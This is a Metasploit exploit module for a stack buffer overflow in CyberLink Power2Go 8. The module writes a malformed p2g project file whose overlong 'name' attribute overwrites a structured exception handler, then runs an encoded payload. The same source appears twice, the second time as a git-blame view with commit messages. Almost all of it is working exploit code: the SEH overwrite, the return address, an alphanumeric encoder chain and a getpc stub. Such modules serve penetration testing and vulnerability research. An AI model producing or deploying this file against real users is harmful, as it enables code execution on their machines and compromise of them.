metasploit-framework/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::FILEFORMAT

	def initialize(info = {})
		super(update_info(info,
			'Name'            => 'CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit',
			'Description'     => %q{
					This module exploits a stack buffer overflow in CyberLink Power2Go version 8.x
				The vulnerability is triggered when opening a malformed p2g file containing an overly
				long string in the 'name' attribute of the file element. This results in overwriting a
				structured exception handler record.
			},
			'License'         => MSF_LICENSE,
			'Author'          =>
				[
					'modpr0be <modpr0be[at]spentera.com>',    # initial discovery
					'mr_me <steventhomasseeley[at]gmail.com>' # msf module
				],
			'References'      =>
				[
					['BID', '50997'],
					['OSVDB', '77600'],
					['EDB', '18220'],
					['US-CERT-VU', '158003']
				],
			'DefaultOptions'  =>
				{
					'EXITFUNC' => 'process',
					'InitialAutoRunScript' => 'migrate -f',
				},
			'Payload'         =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00"
				},
			'Platform'        => 'win',
			'Targets'         =>
				[
					# Power2Go8.exe (0x004b0028) - pop esi/pop ebp/pop ebx/add esp,10/retn
					[ 'CyberLink Power2Go 8 (XP/Vista/win7) Universal', { 'Ret' => "\x28\x4b" } ]
				],
			'DisclosureDate'  => 'Sep 12 2011',
			'DefaultTarget'   => 0))

		register_options(
			[
				OptString.new('FILENAME', [ true, 'The output filename.', 'msf.p2g'])
			], self.class)
	end

	def get_payload(hunter)

		[ 'x86/alpha_mixed', 'x86/unicode_mixed' ].each { |name|
			enc = framework.encoders.create(name)
			if name =~ /unicode/
				enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
			else
				enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EDX' })
			end
			# NOTE: we already eliminated badchars
			hunter = enc.encode(hunter, nil, nil, platform)
			if name =~/alpha/
				#insert getpc_stub & align EDX, unicode encoder friendly.
				#Hardcoded stub is not an issue here because it gets encoded anyway
				getpc_stub = "\x89\xe1\xdb\xcc\xd9\x71\xf4\x5a\x83\xc2\x41\x83\xea\x35"
				hunter = getpc_stub + hunter
			end
		}

		return hunter
	end

	def exploit

		title = rand_text_alpha(10)
		buffer =  ""
		buffer << rand_text_alpha(778)
		buffer << "\x58\x28"        # nseh
		buffer << target['Ret']     # seh
		buffer << "\x5f\x73" * 15   # pop edi/add [ebx],dh (after byte alignment)
		buffer << "\x58\x73"        # pop eax/add [ebx],dh (after byte alignment)
		buffer << "\x40\x73" * 3    # inc eax/add [ebx],dh (after byte alignment)
		buffer << "\x40"            # inc eax
		buffer << "\x73\x42" * 337  # add [ebx],dh/pop edx (after byte alignment)
		buffer << "\x73"            # add [ebx],dh (after byte alignment)
		buffer << get_payload(payload.encoded)

		p2g_data = <<-EOS
		<Project magic="#{title}" version="101">
		<Information />
			<Compilation>
				<DataDisc>
					<File name="#{buffer}" />
				</DataDisc>
			</Compilation>
		</Project>
		EOS

		print_status("Creating '#{datastore['FILENAME']}' file ...")
		file_create(p2g_data)
	end
end
exploit for cyberlinks Power2Go application. I find this software installed by default on alot of HP notebooks along with the CD installer. Not quite sure this was exploited earlier.. 2012-04-13 01:07:36 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# web site for more information on licensing and terms of use.`
Cosmetic changes 2012-04-18 07:25:43 +00:00			`# http://metasploit.com/`
exploit for cyberlinks Power2Go application. I find this software installed by default on alot of HP notebooks along with the CD installer. Not quite sure this was exploited earlier.. 2012-04-13 01:07:36 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
			`Rank = GreatRanking`

			`include Msf::Exploit::FILEFORMAT`

			`def initialize(info = {})`
			`super(update_info(info,`
Cosmetic changes 2012-04-18 07:25:43 +00:00			`'Name' => 'CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit',`
			`'Description' => %q{`
fixed the description... 2012-04-13 01:18:24 +00:00			`This module exploits a stack buffer overflow in CyberLink Power2Go version 8.x`
			`The vulnerability is triggered when opening a malformed p2g file containing an overly`
			`long string in the 'name' attribute of the file element. This results in overwriting a`
exploit for cyberlinks Power2Go application. I find this software installed by default on alot of HP notebooks along with the CD installer. Not quite sure this was exploited earlier.. 2012-04-13 01:07:36 +00:00			`structured exception handler record.`
			`},`
Cosmetic changes 2012-04-18 07:25:43 +00:00			`'License' => MSF_LICENSE,`
			`'Author' =>`
exploit for cyberlinks Power2Go application. I find this software installed by default on alot of HP notebooks along with the CD installer. Not quite sure this was exploited earlier.. 2012-04-13 01:07:36 +00:00			`[`
			`'modpr0be <modpr0be[at]spentera.com>', # initial discovery`
			`'mr_me <steventhomasseeley[at]gmail.com>' # msf module`
			`],`
Cosmetic changes 2012-04-18 07:25:43 +00:00			`'References' =>`
exploit for cyberlinks Power2Go application. I find this software installed by default on alot of HP notebooks along with the CD installer. Not quite sure this was exploited earlier.. 2012-04-13 01:07:36 +00:00			`[`
fixed references, describe target better 2012-04-13 01:23:28 +00:00			`['BID', '50997'],`
Correct OSVDB reference, thanks modpr0be 2012-04-19 17:04:11 +00:00			`['OSVDB', '77600'],`
Fix typo EDB reference 2013-06-14 20:16:20 +00:00			`['EDB', '18220'],`
Correct US Cert references 2012-12-13 20:19:53 +00:00			`['US-CERT-VU', '158003']`
exploit for cyberlinks Power2Go application. I find this software installed by default on alot of HP notebooks along with the CD installer. Not quite sure this was exploited earlier.. 2012-04-13 01:07:36 +00:00			`],`
Cosmetic changes 2012-04-18 07:25:43 +00:00			`'DefaultOptions' =>`
exploit for cyberlinks Power2Go application. I find this software installed by default on alot of HP notebooks along with the CD installer. Not quite sure this was exploited earlier.. 2012-04-13 01:07:36 +00:00			`{`
			`'EXITFUNC' => 'process',`
			`'InitialAutoRunScript' => 'migrate -f',`
			`},`
Cosmetic changes 2012-04-18 07:25:43 +00:00			`'Payload' =>`
exploit for cyberlinks Power2Go application. I find this software installed by default on alot of HP notebooks along with the CD installer. Not quite sure this was exploited earlier.. 2012-04-13 01:07:36 +00:00			`{`
			`'Space' => 1024,`
Cosmetic changes 2012-04-18 07:25:43 +00:00			`'BadChars' => "\x00"`
exploit for cyberlinks Power2Go application. I find this software installed by default on alot of HP notebooks along with the CD installer. Not quite sure this was exploited earlier.. 2012-04-13 01:07:36 +00:00			`},`
Cosmetic changes 2012-04-18 07:25:43 +00:00			`'Platform' => 'win',`
			`'Targets' =>`
exploit for cyberlinks Power2Go application. I find this software installed by default on alot of HP notebooks along with the CD installer. Not quite sure this was exploited earlier.. 2012-04-13 01:07:36 +00:00			`[`
			`# Power2Go8.exe (0x004b0028) - pop esi/pop ebp/pop ebx/add esp,10/retn`
fixed references, describe target better 2012-04-13 01:23:28 +00:00			`[ 'CyberLink Power2Go 8 (XP/Vista/win7) Universal', { 'Ret' => "\x28\x4b" } ]`
exploit for cyberlinks Power2Go application. I find this software installed by default on alot of HP notebooks along with the CD installer. Not quite sure this was exploited earlier.. 2012-04-13 01:07:36 +00:00			`],`
Cosmetic changes 2012-04-18 07:25:43 +00:00			`'DisclosureDate' => 'Sep 12 2011',`
			`'DefaultTarget' => 0))`
exploit for cyberlinks Power2Go application. I find this software installed by default on alot of HP notebooks along with the CD installer. Not quite sure this was exploited earlier.. 2012-04-13 01:07:36 +00:00
			`register_options(`
			`[`
Cosmetic changes 2012-04-18 07:25:43 +00:00			`OptString.new('FILENAME', [ true, 'The output filename.', 'msf.p2g'])`
exploit for cyberlinks Power2Go application. I find this software installed by default on alot of HP notebooks along with the CD installer. Not quite sure this was exploited earlier.. 2012-04-13 01:07:36 +00:00			`], self.class)`
			`end`

			`def get_payload(hunter)`
Whitespace, thanks msftidy.rb! 2012-06-01 00:18:27 +00:00
exploit for cyberlinks Power2Go application. I find this software installed by default on alot of HP notebooks along with the CD installer. Not quite sure this was exploited earlier.. 2012-04-13 01:07:36 +00:00			`[ 'x86/alpha_mixed', 'x86/unicode_mixed' ].each { \|name\|`
			`enc = framework.encoders.create(name)`
			`if name =~ /unicode/`
			`enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })`
			`else`
			`enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EDX' })`
			`end`
			`# NOTE: we already eliminated badchars`
			`hunter = enc.encode(hunter, nil, nil, platform)`
			`if name =~/alpha/`
			`#insert getpc_stub & align EDX, unicode encoder friendly.`
			`#Hardcoded stub is not an issue here because it gets encoded anyway`
			`getpc_stub = "\x89\xe1\xdb\xcc\xd9\x71\xf4\x5a\x83\xc2\x41\x83\xea\x35"`
			`hunter = getpc_stub + hunter`
			`end`
			`}`

			`return hunter`
			`end`

			`def exploit`

			`title = rand_text_alpha(10)`
better randomization 2012-04-15 02:16:51 +00:00			`buffer = ""`
			`buffer << rand_text_alpha(778)`
Cosmetic changes 2012-04-18 07:25:43 +00:00			`buffer << "\x58\x28" # nseh`
			`buffer << target['Ret'] # seh`
			`buffer << "\x5f\x73" * 15 # pop edi/add [ebx],dh (after byte alignment)`
			`buffer << "\x58\x73" # pop eax/add [ebx],dh (after byte alignment)`
			`buffer << "\x40\x73" * 3 # inc eax/add [ebx],dh (after byte alignment)`
			`buffer << "\x40" # inc eax`
			`buffer << "\x73\x42" * 337 # add [ebx],dh/pop edx (after byte alignment)`
			`buffer << "\x73" # add [ebx],dh (after byte alignment)`
exploit for cyberlinks Power2Go application. I find this software installed by default on alot of HP notebooks along with the CD installer. Not quite sure this was exploited earlier.. 2012-04-13 01:07:36 +00:00			`buffer << get_payload(payload.encoded)`

			`p2g_data = <<-EOS`
			`<Project magic="#{title}" version="101">`
			`<Information />`
			`<Compilation>`
			`<DataDisc>`
			`<File name="#{buffer}" />`
			`</DataDisc>`
			`</Compilation>`
			`</Project>`
			`EOS`

			`print_status("Creating '#{datastore['FILENAME']}' file ...")`
			`file_create(p2g_data)`
			`end`
			`end`